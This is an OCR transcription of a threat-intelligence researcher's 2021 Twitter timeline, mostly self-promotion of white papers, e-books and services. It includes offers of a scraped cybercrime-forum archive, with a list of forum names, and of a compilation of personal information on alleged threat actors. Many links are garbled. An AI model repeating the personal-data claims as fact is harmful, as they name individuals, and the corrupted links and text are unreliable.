traffic from their SolarWinds Orion deployments. 


More Credits 


We'd like to thank CERT-SE and all other computer emergency response 
organizations that have helped us with the task of notifying 
organizations that were identified as targeted. We would also like to 
applaud companies and organizations like FireEye, Palo Alto Networks 
Fidelis Cybersecurity, Microsoft, the U.S. Department of Energy and the 
U.S. Federal Courts for being transparent and publicly announcing that 
the SUNBURST backdoor had been used in an attempt to compromise 
their networks. 


7 - Friday 


09:23 
New layout - https://t.co/fnswrm8KWP https://t.co/q44fZxQdtM 


Sample Screenshot of Astalavista.box.sk's Desktop Application - The Search Engine's Power on Your Desktop


8 - Saturday 


04:31 


Folks. Check out the new layout at https://t.co/fnswrm8KWP including our new and 
flagship free Desktop application. The World’s largest and most popular search 
engine for hackers and security experts available online 24/7 with over 3M search 
engine results. https://t.co/oX4305E4fW 


10 - Monday


09:10 


#NewProfilePic https://t.co/6LFWvaLvdE 


10:41 


Thanks to @whoisxmlapi for mentioning my recent discovery of a C&C hosting
infrastructure using @Hostinger free web site hosting service. 
https://t.co/J6e7 LDHM9t #security #cybercrime #malware #CyberAttack 
#CyberSecurity #Threatintelligence #Threatintel 


13 - Thursday 


03:07 


Thanks to @whoisxmlapi for featuring my latest white paper detailing the activities of 
a currently active typosquatting campaign that’s impersonating a well-known 
cybercrime researcher. https://t.co/FAVKGDzskL 


15 - Saturday


02:34 


Sightseeing. https://t.co/lwUpMtWEeB 


16 - Sunday 


07:54 


https://t.co/qsiTxLwmK1 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cybersecuritytips #ThreatHunting 


18 - Tuesday 


01:14 


My latest white paper for @whoisxmlapi is now live. It details the activities of the 
Emotet botnet using Maltego in combination with WhoisXML API’s integration. 
https://t.co/GapYUTnxOa Enjoy! 


01:20 


My second white paper for @whoisxmlapi is now live. It discusses in-depth a recently 
discovered social engineering campaign targeting legitimate security researchers. 
https://t.co/7CIYIKHUjm Enjoy! 


01:33 


“Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher, for the initial 
investigation available here, which led to the creation of this post." - 
https://t.co/J6e7 1DHM9t 


01:37 
I’m on Amazon. - https://t.co/BZWwkLxXujF 
01:39 
My presentations. https://t.co/nNsXMPrGi0O 
01:43 
Listen to my latest podcast for @whoisxmlapi - https://t.co/MDkvbEPrT6 
01:46 
Check out my official personal blog full offline E-book compilation - 
https://t.co/JT676NfPZI 
01:49 
Check out this interview with me - https://t.co/glQoxvUWSs 
01:52 
Check out this interview with me - https://t.co/WeXBlboxrA 
11:00 


Cheers! https://t.co/WhGzweAece 


19 - Wednesday


08:02 


Who wants to obtain free access to my Cybercrime Forum Data Set for 2021 for free 
for research purposes? Drop me a line at dancho.danchev@hush.com 
https://t.co/ZswOuO9Whb 


20 - Thursday 


09:34 




Cheers! https://t.co/Hl48ua8TKc 


Boyan Yurukov
yurukov.net/blog
A Bulgarian abroad who cares much more about the country than a large part of the
Bulgarians living on the territory of the state.


Dancho Danchev
ddanchev.blogspot.com
He is perhaps the most influential Bulgarian blogger worldwide - a technical expert in
the field of cybersecurity.


Ivan Bakalov
e-vestnik.bg
One of the few remaining islands of free and freedom-loving thought, professionally
edited and distinguished by a number of joint quality publications with other blogs.


Nevena Gyurova
semkiibonbonki.blogspot.com
She does not give up despite all the difficulties she faces, and tirelessly continues
to expose the ills of Bulgarian politics.


21:40 


Thanks @whoisxmlapi for mentioning my research - "Thanks to Dancho Danchev, 
WhoisXML API's DNS Threat Researcher, for the original investigations available here, 
which led to the creation of this post." - https://t.co/I2IwsIx56G 
https://t.co/oAECIhXGoy 
automauto.com opozitiv.com soulvego.com transdeals44.cc


21 - Friday 
04:40 
@Treadstone71LLC Try me here - "An OSINT conducted is a tax payer’s buck saved 
somewhere". 
04:44 


@taosecurity This is where the basics of Technical Collection and threat intelligence 
come into play. Check out this post - https://t.co/voila4FF4W 


04:50 


Thanks @jabolins for following me! I sincerely hope that you’re still keeping track of
my research at https://t.co/JTcqOaYgET Cheers! Dancho 


22 - Saturday


05:06 


https://t.co/qs5iTxLwmK1 #security #cybercrime #malware #CyberAttack 
#cyberattacks #Threatintel #ThreatHunting #ThreatIintelligence 


21:31 
Grab a copy today! https://t.co/JT676NfPZI https://t.co/1lxyslqSxpS 


Dancho Danchev

An In-Depth Picture Inside Security Researcher's Dancho Danchev Understanding of
Security Hacking and Cybercrime Incidents

Dancho Danchev's Personal Security Hacking and Cybercrime Research Memoir


24 - Monday 


04:28 
https://t.co/ORdmSEx]ve #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cyberattacks #ThreatHunting #Threatintel


25 - Tuesday 


02:48 


Folks. Check out my latest paper for @whoisxmlapi in combination with @MaltegoHQ 
- https://t.co/ey3Zu9inRE Enjoy! https://t.co/nRi5JkWExD 


02:49


This is my second white paper which I’ve recently produced for @whoisxmlapi in 
combination with @MaltegoHQ - https://t.co/yKBHb7ctED Enjoy! 
https://t.co/t5Piftb4pB 


12:54 


https://t.co/QnR4IlYyLS #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting #Threatintelligence 


12:57 
https://t.co/XwcRxjxlA4 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting #Threatintelligence 
12:58 


https://t.co/2S64PGzZBO2 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting #Threatintelligence 


27 - Thursday 


09:37 
Folks. Check out my latest case study for @whoisxmlapi - https://t.co/pINUOWtTEt 
#security #cybercrime #malware #CyberAttack #CyberSecurity Enjoy! 
23:09 


https://t.co/n7jJ66hBGrY #security #cybercrime #malware #CyberSecurity 
#Threatintel https://t.co/DmMkRV8Da7N 


28 - Friday 


02:11 


I’m urgently looking for a full-time or part time OSINT Analyst or Intelligence Analyst 
position within a major defense contractor or an actual U.S alphabetical agency.
Who’s interested? Direct hire propositions only - drop me a line at 
dancho.danchev@hush.com https://t.co/at5pmd9bcw 


23:46 


My latest white paper for @whoisxmlapi is now live. https://t.co/Bxlb5yCIfL 
https://t.co/9Mr39yyfkt 


29 - Saturday 


10:05 


https://t.co/7pEoKgDo3m #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting 


30 - Sunday 


23:15 


https://t.co/J5KIL8ciT5 #security #cybercrime #malware #CyberAttack 
#threathunting 


23:19 


https://t.co/Q8r3PsYkR4 #security #cybercrime #malware #CyberAttack 
#threathunting 


23:38 


Check out my latest white paper for @whoisxmlapi - https://t.co/msirDOaJxQ 
https://t.co/cMqb6Mjk1lu 


June


3 - Thursday 


21:13 


Check out my latest white paper for @whoisxmlapi - https://t.co/eEp4MV5Pay 
#security #cybercrime #malware https://t.co/omWLRNcixXg 


21:38

https://t.co/VR1pzSpH4q 
21:39 

https://t.co/NpOydByqRu 
21:39 

https://t.co/BVxTWA7AML 
21:40 

https://t.co/HKaNdgiOAQ 
4 - Friday 
06:03 


My first article for @CyberNews - https://t.co/F9GdjOPCoO 


6 - Sunday


05:27 


Recommended reading - https://t.co/WQOxdQPzGV #cybercrime #malware 
#CyberAttack #ThreatIntel 


08:06 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberSecurity 
#CyberAttack #ThreatIntel https://t.co/DValiLBU3D 


https://t.co/GNKij2Dhyb #security #cybercrime #malware 


9 - Wednesday


07:09 


"Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher, for the original 
investigations available here, which led to the creation of this post". - 
https://t.co/I2Iws|x56G 


10 - Thursday


08:57 


“Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher for the original 


investigations available here and led to the creation of this post" - 


https://t.co/zkktkoJUL5 


11 - Friday 


01:02 
https://t.co/jz2|IVBtXu5 


04:08 
https://t.co/sFBCulmx43 


12 - Saturday 


22:52 

https://t.co/2AdYzaF2UN #security #cybercrime #malware 
22:55 

https://t.co/ISAGNcpzqHN #security #cybercrime #malware 
13 - Sunday 
22:44 

https://t.co/9u5tSzr8zp #security #cybercrime #malware 
22:48 

https://t.co/kDbIOAIqzR #security #cybercrime #malware 
14 - Monday 
14:38 

https://t.co/qa4MIsIFnt #security #cybercrime #malware 
15 - Tuesday 
00:41 

https://t.co/va7iOJqQaG #security #cybercrime #malware 
20 - Sunday 




11:49 
https://t.co/lhptwQO3hS #security #cybercrime #malware 


23 - Wednesday 


00:34 


“Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher for the original 
investigation available here which led to the creation of this post." - 
https://t.co/Av4B04M038 


00:38


https://t.co/L870T9SM1j #security #cybercrime #malware 


00:42
https://t.co/ORAqClYePM #security #cybercrime #malware 


24 - Thursday 


10:04 

https://t.co/ORAqClYePM #security #cybercrime #malware 
10:10 

https://t.co/MxEdbUPv2A #security #cybercrime #malware 
10:10 

https://t.co/gVtQ7wPK1D #security #cybercrime #malware 
10:10 

https://t.co/lIQS7jiO0ai #security #cybercrime #malware 

13:00 


Enjoy! #security #cybercrime #malware #CyberSecurity #CyberAttack 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/U3McCkZWVj 


All Warfare is Based on Deception

[Cartoon; speech-bubble text as recovered:]

- "... with Do's cyber assets"
- "Our NIDS are detecting numerous traffic anomalies at some of our mailservers."
- "... deception! While they concentrate on the mail servers, we'll transmit back the
  data obtained from the infected ..."
- "... unacceptable. Initiate an immediate traceback!"
- "... from the Russian to facilitate OSINT through botnets. “Ensure your victory
  before starting a battle", said Sun Tzu!"
- "The Chinese are getting smarter Andrei. Last month they bought access to .mil and
  .gov infected hosts only, and look at this Pentagon puppet show now"
- "It's called “segmenting the attack population" Yuri. Perhaps we should print out
  new brochures."


22:29


https://t.co/AlwOJSMBS4 #security #cybercrime #malware


22:29


https://t.co/zfkLWvtKzi #security #cybercrime #malware


27 - Sunday


06:17


https://t.co/JTcqOaYgET https://t.co/HWwxpOVNWc


06:18
https://t.co/JTcqOaYgET https://t.co/LtbxNOOWio 


06:18


https://t.co/JTcqOaYgET https://t.co/zicmhNBxXul 


06:18


https://t.co/JTcqOaYgET https://t.co/alF7qK8HGq 


https://t.co/JTcqOaYgET https://t.co/MCulCVBZF5


29 - Tuesday


19:41 


Check out my latest white paper for @whoisxmlapi in combination with @MaltegoHQ. 
Enjoy! https://t.co/MAtbulhtLx 




July 


5 - Monday 


07:47 


Who wants to work with me on my upcoming memoir and ask me professional 
research questions? Are you familiar with my work at - https://t.co/JTcqOaYgET
including here https://t.co/UZ6qVAhXVF feel free to reply or drop me a line at 

dancho.danchev@hush.com https://t.co/7UTe6kCf6S 


6 - Tuesday


04:10 


“Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher, for the original 
investigation available here and that led to the creation of this post". 
https://t.co/NFiKpVOTyg 


11:12 


It used to be a moment in time when we "used to rock the boat". It’s official - I’ve 
decided that this is going to be my last post on my personal blog - 
https://t.co/1tNrMb3jn4 Want to know more? Drop me a line at 
dancho.danchev@hush.com and say "hi". 


8 - Thursday


09:02 


"Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher for the original 
investigation available here which led to the creation of this post." - 
https://t.co/Av4B04M038 #security #cybercrime #malware 




09:03 


"Our security researcher Dancho Danchev has been tracking the fake news network 
and provided indicators of compromise (IoCs), specifically 27 domains known to have
taken part in the network’s disinformation campaigns" - https://t.co/KGPVEVn92Y 


14:07 
#NowPlaying - https://t.co/zT5IJNsfXxd 


9 - Friday 


07:40 
RSA Europe 2012. https://t.co/yXp80aUkTh 


07:41 


RSA Europe 2012. https://t.co/co7p5mKVgO 


07:41


RSA Europe 2012. https://t.co/3vDneEvKae 


08:12 


@Wh1t3Rabbit I second that. It wasn’t necessarily that big of a conference but I got
some pretty interesting questions including the following article -
https://t.co/IJv9LOfPZp by the way am I still in for a podcast participation? Where can
I reach you? Regards. Dancho


14:22 


Folks. From an undisclosed location with love. These personal and never-published
before personal photos are in a way tribute to my grandparents who greatly shaped
me and my professional career the way I am. Long story short they got me my first
and several other PCs. God bless! https://t.co/OORTJw2Zuc


14:27


https://t.co/39JWq7V8Md #security #cybercrime #malware 


10 - Saturday 


11:01 


https://t.co/JTcqOaYgET #security #cybercrime #malware #CyberSecurity 
#CyberAttack #ThreatHunting #Threatintel #Threatintelligence 
https://t.co/zeuXoYf5VX 


DANCHO DANCHEV'S BLOG

DANCHO DANCHEV'S "CYBER CONSPIRACY - WHO OWNS THEM ALL"


11 - Sunday 


06:06 
Soliciting your feedback! Guys and girls can you please send me your research 
questions for my upcoming memoir by replying to this tweet? - 
https://t.co/JTcqOaYgET it would be greatly appreciated. Let’s get the conversation 


going! 
06:08 
An OSINT conducted today is a tax payer’s buck saved somewhere - 
https://t.co/TdjILwBBLb #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintelligence #Threatintel 
06:09 


If terrorism is a form of crime then cybercrime is a form of economic terrorism.
#security #cybercrime #malware #CyberSecurity #ThreatHunting 
#Threatintelligence #Threatintel 


20 - Tuesday


06:28 
#NowPlaying - https://t.co/3eGMHGbboO 


21 - Wednesday 


10:37 


https://t.co/8BGO7YwCEp7 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:37 
https://t.co/ezdqlA4Uyd #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 
10:38 


https://t.co/UkYZqtigf5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:38 


https://t.co/tzInPphJM7 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:39 


https://t.co/A56nPh3c8T #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:39 


https://t.co/YSZ7CPm1p] #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:39 
https://t.co/9FfBF2fltK #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


22 - Thursday


12:28 


https://t.co/o5p97xXOMp #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence 


12:28 


https://t.co/VrECbY1mSA #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


12:29 


https://t.co/Mw5RcfUgmC #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


12:29 


https://t.co/5g|x4KAz58 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


12:29 


https://t.co/l1kaQ9wwkLd5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


12:30 


https://t.co/8gxavMjKvi #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


12:30 


https://t.co/sfFITBeCoL #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


27 - Tuesday


02:09 


https://t.co/wtf66GHZ1S #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting 


28 - Wednesday 


12:11 
#NowPlaying - https://t.co/salcE8H5KS 


29 - Thursday 


03:41 


Folks. I’ve just finished my 2021 compilation entitled "Personally Identifiable 
Information Regarding Various Internationally Recognized Cyber Threat Actors". 
Interested in obtaining a copy? Drop me a line at dancho.danchev@hush.com 

https://t.co/C1SIVCZ5V5 


Personally Identifiable Information Regarding some of the most High-Profile
Internet Cybercriminals Cybercrime Gangs and Various Internationally Recognized 
Cyber Threat Actors — A 2021 Compilation 


By Dancho Danchev 
24.07.2021 


04:03 


Who wants a free copy of my latest compilation? Drop me a line at 
dancho.danchev@hush.com Cheers! #security #cybercrime #malware 
#CyberSecurity #CyberAttack #ThreatHunting https://t.co/lLm5BLwT5hD 

11:38 


https://t.co/kyI5GvScSi #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #Threatintelligence #threatintel 
11:42 


https://t.co/R2YnpeTX7o #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #Threatintelligence #threatintel 
https://t.co/GB7XliQdsR 
30 - Friday 


14:11 


https://t.co/FQbAnZoe9i #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #threatintelligence 


31 - Saturday 


03:31 


Grab a free copy today! https://t.co/BGwwYV5mz6 #security #cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #ThreatDetection #ThreatHunting 
#Threatintel Cheers! 


21 
06:08 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #cyberattacks #CyberSec 
#cyberthreats #ThreatHunting #threatintel #ThreatDetection 
https://t.co/zsMrM9LidV 




August 


6 - Friday 
07:15 
#NowPlaying - https://t.co/4naTAGr9uO 


07:17 


https://t.co/BGwwYV5mz6 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #threatintelligence 
07:23 


https://t.co/vVYLJAEABvg #cybercrime #malware #CyberSecurity #CyberAttack 
#threatintelligence 


22:55 


My latest white paper for @whoisxmlapi - https://t.co/woPPY5BB2F Enjoy! #security 
#cybercrime #malware #CyberSecurity #threathunting #threatintelligence 


23 - Monday 


12:03 
https://t.co/qLxz4GuRip #security #cybercrime #malware https://t.co/phOh9k91gK 


12:06 


https://t.co/JIcqOaYgET #security #cybercrime #malware #ThreatHunting 
#CyberSecurity #CyberAttack https://t.co/TrOFOalljN 
25 - Wednesday 


01:45 
I offer OSINT/cybercrime research and threat intelligence gathering training. 
Approach me at disruptive.individuals@gmail.com or visit https://t.co/OmUajr8DT8 
and we can organize something. Also if you’re interested in threat actor attribution I’m 
here to help. https://t.co/y5QsjYhQK2 




02:46 
https://t.co/OmUajr8DT8 https://t.co/jA3n4FTdF6 
09:59 


#NowPlaying - https://t.co/gtP9dxxQqo 


27 - Friday 


02:32 
Folks. Check out this analysis which I recently did on "Cyber Threats Facing U.K’s 
Based Internet-Connected Infrastructure". This is great stuff and I’m sure that you'll 
find the research informative. https://t.co/EoqHZoaY55 https://t.co/8K6fw1Xpfd 


04:23 
Guys and girls. Who has experience with security automation and can assist with 
some of their spare time to work with me on a crowd-sourced sensor for spam 
phishing and malware where the goal would be to build a crowd-sourced sensor for 
malicious activity? https://t.co/FWulez359W 
23:35 


https://t.co/qLxz4GuRip #security #cybercrime #malware #CyberSecurity 
#Threatintel #threatintelligence https://t.co/pX3rOoFwVhW 
Cyber Intelligence 

The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 

https://ddanchev.blogspot.com 

Dancho Danchev 


28 - Saturday 
01:21 


I’m currently offering access to a 19GB Cybercrime Forum Data Set which consists of 
111 full offline copies of popular cybercrime forum communities ready for processing 
and enrichment. Drop me a line at dancho.danchev@hush.com in order to obtain 
access. https://t.co/LrliW6w7e8U 
<parent> Darkmoney iHonker ShadowMarket 
11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigFozzy Free-hack pay-per-install.org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


06:59 


Who wants to obtain commercial access to my Cybercrime Forum Data Set for 2021 
and 2019 which consists of approximately 111 full offline copies of cybercrime 
friendly forum communities and is currently 19GB? Drop me a line at 
dancho.danchev@hush.com https://t.co/YzgEtCy3WP 


4HatDay.rar 
11Wang.rar 
aHack.rar 
Aljyyosh.rar 
alligator.cash.rar 
Antichat.ru.rar 
ArmadaBoard.rar 
BigFozzy.rar 
BlackhatWorld.rar 
blacktip.top.rar 


07:00 


Who wants to obtain commercial access to my Cybercrime Forum Data Set for 2021 
and 2019 which consists of approximately 111 full offline copies of cybercrime 
friendly forum communities and is currently 19GB? Drop me a line at 
dancho.danchev@hush.com https://t.co/kgHppXACLr 
07:01 


ghostmarket.net.rar 
Gla.vn.rar 
gofuckbiz.com.rar 
GoFuckBiz.rar 
hOst.pw.rar 
H4kurd.com.rar 
hack-academy.ru.rar 
hackademics.fr.rar 
Hackersoft.rar 
Hackingboard.rar 
Hackings.rar 
Hack-Port.rar 


Who wants to obtain commercial access to my Cybercrime Forum Data Set for 2021 
and 2019 which consists of approximately 111 full offline copies of cybercrime 
friendly forum communities and is currently 19GB? Drop me a line at 
dancho.danchev@hush.com https://t.co/LMad78CKx1 


23:55 


ProLogic.rar 
Promarket.rar 
ProxyBase.rar 
red.ug.rar 
replace.org.ua.rar 
reversing.cc.rar 
russiancarder.ru.rar 
security-teams.net.rar 
se0Cafe.rar 
SEOForum.rar 
shadowcrew-2.rar 


Dear friends and colleagues. Today I’m offering a special discount to anyone who 
requests commercial access to my Cybercrime Forum Data Set for 2021 including 
2019. Drop me a line at dancho.danchev@hush.com https://t.co/IKagqiH27pl 
23:56 


Dear friends and colleagues. Today I’m offering a special discount to anyone who 
requests commercial access to my Cybercrime Forum Data Set for 2021 including 
2019. Drop me a line at dancho.danchev@hush.com https://t.co/7MfpfuU1Mx 


23:57 


Dear friends and colleagues. Today I’m offering a special discount to anyone who 
requests commercial access to my Cybercrime Forum Data Set for 2021 including 
2019. Drop me a line at dancho.danchev@hush.com https://t.co/2VkW2FaAZO 
23:58 
Dear friends and colleagues. Today I’m offering a special discount to anyone who 
requests commercial access to my Cybercrime Forum Data Set for 2021 including 
2019. Drop me a line at dancho.danchev@hush.com https://t.co/ch6pmrzoOlf 


30 - Monday 


03:07 
Folks. Check out my most recent white paper for @whoisxmlapi in combination with 
@MaltegoHQ - https://t.co/GqsdW8qGNw https://t.co/bgQUxidumf 




03:08 


Here’s my second white paper for @whoisxmlapi in combination with @MaltegoHQ - 
https://t.co/esCOMMUK5M https://t.co/js734RDWUR 


31 - Tuesday 


00:30 


https://t.co/qLxz4GuRip #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintel #threatintelligence https://t.co/1rJTGslvBc 


September 


3 - Friday 


09:17 


@whoisxmlapi DNS security researcher Dancho Danchev shared a list of 993 known 
email addresses with connections to Conficker domain registrations. - 
https://t.co/dwF2QbDThu #security #cybercrime #malware #CyberSecurity 
#CyberAttack 
8 - Wednesday 


00:30 


https://t.co/O3mkFmssMT #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #Threatintelligence 


*1 
00:30 
https://t.co/IZXJSQAUrL #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #Threatintelligence 
*1 
00:31 


https://t.co/66PcMI2VqM #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #Threatintelligence 


*1 
00:31 
https://t.co/LQ2hr3wzpO #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #Threatintelligence 
*1 
00:40 


Folks. I’m trying to re-build my Twitter network of followers. Are you reading this? 
Can you possibly RT so that I can once again gain more followers and get back 
officially on Twitter again? Much appreciated. Cheers! 


00:43 


Q: How did you start your career? A: It’s by coming across this President Nixon’s 
quote on the CIA - "What use are they? They’ve got over 40,000 people over there 
reading newspapers." which is how I got involved in #OSINT as an independent 
contractor. 


<1 *2 
00:46 


Who wants a full copy of my personal blog (https://t.co/JTcqOaYgET)? Get a copy in 
multiple E-Book formats from here - https://t.co/JT676NfPZI Enjoy! RT pls! #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting #Threatintel 


21 
00:47 
This is all of my research which I did for @Webroot during 2012-2014 in multiple 
E-Book formats. Get a full copy here - https://t.co/eVsxfo6tWx #security #cybercrime 
#malware #CyberSecurity #cyberattacks #ThreatHunting #Threatintel 


00:48 


And this is all of my research and articles which I did for @ZDNet during 2008-2012. 
Grab a full copy in various E-Book formats here - https://t.co/JKEO67UcqWw #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting 




00:49 


Interested in learning more about cyber warfare? This is my articles compilation for 
https://t.co/BKKLYQSBQB which is my personal E-Shop for intelligence deliverables 
available in multiple E-book formats. Grab a full copy here - https://t.co/Xolw3nvMqY 


00:50 


And here’s a compilation of articles on various privacy topics from my Medium 
account (https://t.co/sMWCGUWR6gq) available in multiple E-book formats - 
https://t.co/k5QSE62Vkc #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting 


23 
00:52 


Hey @MaltegoHQ - check out this graph available in my report on Iran’s CNE 
capabilities from 2015 - https://t.co/fRbK11tuUD CC: @Treadstone71LLC - Jeffrey I’m 
sure that you'll find this report pretty informative. RT pls. #security #cybercrime 
#malware 


00:53 
Hey @Treadstone71LLC here’s the second version of the original report on Iran’s CNE 
capabilities which I’m sure that you'll find informative - https://t.co/p6siiRueVF RT pls! 
00:54 


Folks. Here’s a full copy of my "Astalavista Security Newsletter" which I did while I 
was running the portal during 2003-2006 available in multiple E-book formats - 
https://t.co/dfBji24CcX knowledge is everything! Stay tuned! 


00:55 


Want to know more about #malware and how I actually made it to @slashdot once? 
Check out my "Malware - Future Trends" paper here - https://t.co/8wfdqxgEcX and 
here’s the actual Slashdot article - https://t.co/ogWebSViBO 


00:57 


Here’s an informative white paper which I did for @TechGenix in particular - 
https://t.co/RSFlvVailc at the time which is basically a how-to on building and 
implementing security policies - https://t.co/GuxdGVTDoM 


00:58 


Do you remember my Koobface research? Here’s the actual video presentation from 
@CybercampEs which I did in 2016 as a Keynote - https://t.co/erFRtsgxNM #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting 
=3 
00:59 
Interested in learning more about how I got into OSINT/cybercrime research and threat 
intelligence? Here’s my 2021 memoir available in multiple E-book formats - 
https://t.co/WeZmxLgin2 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting 


01:01 
Cyber Threat Actors? The bad guys? You wish. Here’s my 2021 compilation of 
personally identifiable information on major and popular cyber threat actors available 
for download - https://t.co/BGwwYV5mz6 RPT pls! 


01:06 
Did you know? Oleksandr Vitalyevich Ieremenko and Danil Potekhin which are on the 
U.S Secret Service’s Most Wanted List run a managed Android malware enterprise 
including a Black Energy DDoS botnet. Here’s the analysis - https://t.co/wtf66GHZ1S 
RT pls! https://t.co/5jTkk9facS 
01:32 


Check this out! 113,500 Conficker domains courtesy of Microsoft -> cross-checked 
using @whoisxmlapi’s current and historical WHOIS records database to look for 
clues -> the majority of domain registrants use QQ as an email provider - 
https://t.co/woPPY5BB2F 


9 - Thursday 


01:10 


https://t.co/oUTxPavoAg #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #ThreatHunting https://t.co/jQcC9RYRzZ4a 




10 - Friday 


20:13 


https://t.co/tRytd1Tx4k #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #threatintelligence 


11 - Saturday 


00:19 


https://t.co/yEOAC3QNpp #security #cybercrime #malware #CyberSecurity 
#threatintelligence 


07:11 


Search engine for hackers and security experts. 3.5M results and counting - 
https://t.co/HfeLycnF4e check out the front page here - https://t.co/fnswrm8KWP 
Enjoy! https://t.co/vAdmVUCrLo 


Web Search by the People, 
for the People 


14 - Tuesday 


02:01 


https://t.co/nNsXMPrGiO #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence https://t.co/PTp6ACcKPfC 


Intell on the Criminal Underground - Who’s Who in Cyber Crime for 2007? 


02:02 


https://t.co/WeZmxLgin2 #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence https://t.co/xw1X2l1uDr 


02:03 


https://t.co/kyI5GvScSi #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence https://t.co/SWRx0zZqIA 
02:10 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence https://t.co/2dq45bM1z1 
14:52 


https://t.co/H7ZRZUN59S #security #cybercrime #malware #CyberAttack 
#ThreatHunting #Threatintel #Threatintel #threatintelligence https://t.co/jISHaPKfK6 
T5tlt 


https://t.co/H7ZRZUN59S #security #cybercrime #malware #CyberAttack 
#ThreatHunting #Threatintel #threatintelligence https://t.co/rxKxYYpGLK 
18 - Saturday 


07:20 


https://t.co/JTcqOaYgET has come to an end?! The blog has a new address - 
https://t.co/DjegbOF3Wx bookmark it today and visit it on a daily basis! Keep it cool! 
Image courtesy of a loyal blog fan. Second image courtesy of me while attending a 
private party! https://t.co/3XSou8VIikn 
07:26 


https://t.co/Kkm3ThT8W2 #security #cybercrime #malware #CyberSecurity 
#Threatintel #ThreatHunting #Threatintelligence 


20 - Monday 


12:53 


https://t.co/327gMDfvFr #security #cybercrime #malware #cybersecurity 
#threatintel #ThreatHunting 


22 - Wednesday 


06:35 
My corporate head shot circa 2012. https://t.co/8ZV18qfGOK 
29 - Wednesday 


10:16 


Check this out and don’t forget to "stay tuned". Setting them straight since the early 
days of humankind - https://t.co/DjegobOF3Wx Cheers! Dancho #security 
